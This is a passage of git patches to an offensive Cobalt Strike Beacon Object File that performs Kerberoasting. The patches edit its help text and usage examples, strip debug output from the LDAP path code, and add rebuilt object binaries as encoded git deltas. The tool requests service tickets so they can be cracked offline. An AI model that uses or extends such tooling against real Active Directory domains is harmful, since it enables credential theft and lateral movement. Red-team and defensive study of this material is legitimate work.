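            BeaconPrintf(CALLBACK_ERROR, "LDAP path exceeds buffer size.\n");
            hr = E_INVALIDARG;
            goto CleanUp;
        }
    } else {
        // … unchanged: rootDSE bind and defaultNamingContext lookup …
    }
```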
From 17f7d5eb38508fa00e05ac90300021e6c2036550 Mon Sep 17 00:00:00 2001 From: nviso-facar Date: Wed, 28 Aug 2024 16:16:46 +0200 Subject: [PATCH 2/3] Changed CNA script to inform that added options are only available for roast commandss --- BOF/Kerberoast/Kerberoast.cna | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/BOF/Kerberoast/Kerberoast.cna b/BOF/Kerberoast/Kerberoast.cna index 65c471b..d0b71e0 100644 --- a/BOF/Kerberoast/Kerberoast.cna +++ b/BOF/Kerberoast/Kerberoast.cna @@ -5,9 +5,9 @@ #register help beacon_command_register("Kerberoast", "Perform Kerberoasting against all (or specified) SPN enabled accounts.", "List all SPN enabled user/service accounts or request service tickets (TGS-REP) which can be cracked offline using HashCat.\n\n" . - "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . + "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . "Example 1: Kerberoast roast svc_sql \n" . - "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local #listing cross-domain is not implemented\n\n" . + "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local \n\n" . "WARNING: Listing and roasting tickets without sAMAccountName filter is OPSEC UNSAFE!\n\n"); alias Kerberoast { From 586fb70a9d33e709dc3b68ee818b7ba4557b69d2 Mon Sep 17 00:00:00 2001 From: nviso-facar Date: Wed, 28 Aug 2024 17:03:52 +0200 Subject: [PATCH 3/3] Removed debug artifacts and rebuilt binaries --- BOF/Kerberoast/Kerberoast.cna | 2 +- BOF/Kerberoast/Kerberoast.x64.o | Bin 15025 -> 14805 bytes BOF/Kerberoast/Kerberoast.x86.o | Bin 14259 -> 14031 bytes BOF/Kerberoast/SOURCE/Kerberoast.c | 5 +---- 4 files changed, 2 insertions(+), 5 deletions(-) diff --git a/BOF/Kerberoast/Kerberoast.cna b/BOF/Kerberoast/Kerberoast.cna index d0b71e0..550676a 100644 --- a/BOF/Kerberoast/Kerberoast.cna +++ b/BOF/Kerberoast/Kerberoast.cna 
@@ -8,7 +8,7 @@ beacon_command_register("Kerberoast", "Perform Kerberoasting against all (or spe "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . "Example 1: Kerberoast roast svc_sql \n" . "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local \n\n" . - "WARNING: Listing and roasting tickets without sAMAccountName filter is OPSEC UNSAFE!\n\n"); + "WARNING: Listing users without sAMAccountName filter is OPSEC UNSAFE!\n\n"); alias Kerberoast { $bid = $1; diff --git a/BOF/Kerberoast/Kerberoast.x64.o b/BOF/Kerberoast/Kerberoast.x64.o index b18eb69dc9cf37492876f90892c929f7be4e007d..1e382522a6818408ea13797979ebeb8ea18cfba4 100644 GIT binary patch delta 843 zcmZXSUr1AN6vxkRZn`bRLB_T_H|@{#s&lqEF%+VOgIf)@Ac$Z=%gro?NV`HJHfb!l ztbvywM(ZUIeTaN0?o**K?WG`L8THaj1WD2;q=&+U+qw7BE$DZDoZshu&pE$y?*09q zOuo%pQnwpG88*@4>X~f;@DYF-t7@=`OB=*5`BO!Tz+-Jh?)EVz2FR<+#bS8sEw&w{~zyU zH&>ijG_Dk>o)TV1OQvNrz%wwQB&=~olhT4*-QELgV)}jS=#;BM!G|gNRmH*-!<7zv zK>cYWzWvSUrlU;I@Y781GfXRM`Op7SiN>l}GD_btA$r)wkp#`S2FQxE=sHgbPxo4S z$W7Yi4v@Pv;qG!i#%=y>t5D(XSiNGQ58THO<#uIRh}7~kHJGv%BQ;^|^TL)a&vE(M z?8WDEIOs3;M)M;E;2aiL)@eM06f)iM?3ccI%I4-M3_}>=FbKW)cp(E>pf5U(Q6rnO zhljJViS&5v^0o8`-!_`Onn|bpR-k3}4E@O7k}{p1hMeF4Xu>^>a1Y6=(mP%Is?#o# zQ}s6Ca#W=dl9n6SDS?C&_Z!!>8KibqD4=)~P}d|~d#`Jskb1Sidi=9mvJFYo+`86@q%}AseGiD_pmG=l hufGBOeEJ5DwUmK(7V3y{NSk!2?+O`|8bgcqzX8Gkv=9IQ delta 1051 zcmZXSUr19?9LIl0U2e-V$Z)%xYY)w7{%cpGGN^S4G&BnCayLz1w9UZuGG?mc!$y!Ud>=YD^`@9%f+Irn4q zNuMEfsTkBNpEOwNvQ~gv0x(vsX)uSA9RkPdL%~>(N!qv$$KT2Jwt^B{@=m30z^1-t zHtHsf0H2e;oCR`qN+6Tv9ONCHH$_%=O7W@QB6P;~)5B(QpET~t?oFhn@ePml z058-s(Cy8^*j#2-8zw!50`4mpbFSWKIisAwPM^E zb}df{Ux=LxMwg1VxT9^o;hwhRr@~z^`-xz;91hhRsp9lfU)3;y)Y~dY@ldx3pcJbW zK_8M?qe-qkMRI7`8?I$}-dap&-bzj)606dR(-zGu^XO$xSCQ};!p8Tw_zbC1v*eIm z8hz!_A4vG1V>fOrYwSg0+5(cOMLR42jT*^FO&X1Gy2aQ|KKZqyE#gwb@ G?yA2-9p;Px 
diff --git a/BOF/Kerberoast/Kerberoast.x86.o b/BOF/Kerberoast/Kerberoast.x86.o index 0cfdd92aa53f735280ea7a4981145d210b5eb2d7..9b944bf78c1381bc34f6d4277c57b084d369ef52 100644 GIT binary patch delta 719 zcmZXQO=uHA6oB6(yJ<*MX*J1iHYudKX^NWNZ9Qp=7?U8aE!E;xG_es3sS1stkWeH@ z4Z%bDD0oakJcx+0XGO#ie-5@idJ#NG0wS%59z^2HF3!cBW%irzy_xrB&1)Z)JhRLN zy=OSFHt(Kq;P{oa2?e1nLjKi|d-r$@phkyJZeo0xq(`39YAIDE}l8xbk zpzcV1GtUM6jGe%|a*)m7x}vcxzE)zagkKez-9<5!^rwG!yVZ2NQf|Yo{#v?S71Z_v z^L(i0_RT^H5^x5Nflea|1y}|gQ}0WO)bjlG+|~JPK6j}YxtzID$SrCfz+H9PoQgKs zNZ3g|CHA=QI8F|Tr&gWLA!oDY6@)P92>p*a^UtWiuRj|A=v~wWH*s9sx6xfa?7S)N7Kl`9N0CUk=mn3yBchjTPRam=Me9W404pRP5l&e06{nA! zzH<_T|C$*j+HdVJxSQne0(W`tR=Hc_u0gcdzTIO&yTj)}Ea^LJ8kdZa*d@J<_lzWS Jm|MnY*I)OJiV^?- delta 971 zcmZXTPiWIn9LIleO}iR9L1>$pRf$`+!o*|~ybKlVQq;9vFydhcQBY+5Ik>|PJ2((Utl%y(Jt#7NN%YZS5?(%hzrXkWy(BMh z(`JT`6AxI&l2+oS-Mtb3M*#d`TZCo2$2h1^M8UsXkOSwp3pf#^uKfbnu-ql z=!&3`HCiKzA$gO%fJ*y4mRj9(8W9hO8pxRTaAMb5$J+e(C}=46lAe$MP+|R);pYPdaHi2Wuuk6oV#db|As~MZ0A6- zzw`9@WM57`W1LGR6Dm(*%29JdxlMKsxiC7i#hb4>RO3E;!{xf*da>Z+xDd)RevSv` ziN-+nNKX*JdQl$eMG|bf%Ct$OdRx2Cw0Tzdm1%CA=%j2#a#9-crrL9lFxOy|M#5_Z z8xJvY0?FDp9(aVL+4PdROGtR3yF>ift_jJ}rjVL#_d8OHP5d^1JvP-bYGu@oG~(Dv zL}&d2NOksaCZaVOTPVcEJWR{L;weC~s PFVk7AjkKGq+6T`c*zCuW diff --git a/BOF/Kerberoast/SOURCE/Kerberoast.c b/BOF/Kerberoast/SOURCE/Kerberoast.c index c1351af..9f7c067 100755 --- a/BOF/Kerberoast/SOURCE/Kerberoast.c +++ b/BOF/Kerberoast/SOURCE/Kerberoast.c 
@@ -540,10 +540,8 @@ HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR // Construct the LDAP path if (lpwDC != NULL && lpwDN != NULL) { // Use DC and DN if provided MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls/%ls", lpwDC, lpwDN); - BeaconPrintf(CALLBACK_OUTPUT, "wcPathName 1: %ls\n", wcPathName); - } else if (lpwDC != NULL && lpwDN == NULL) { + } else if (lpwDC != NULL && lpwDN == NULL) { // Use only DC if DN is not provided MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls", lpwDC); - BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no DN: %ls\n", wcPathName); } else { // Get rootDSE and the current user's domain container DN. hr = ADsOpenObject(L"LDAP://rootDSE", @@ -566,7 +564,6 @@ HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR MSVCRT$wcscpy_s(wcPathName, _countof(wcPathName), L"LDAP://"); MSVCRT$wcscat_s(wcPathName, _countof(wcPathName), var.bstrVal); - BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no extras: %ls\n", wcPathName); } hr = ADsOpenObject((LPCWSTR)wcPathName,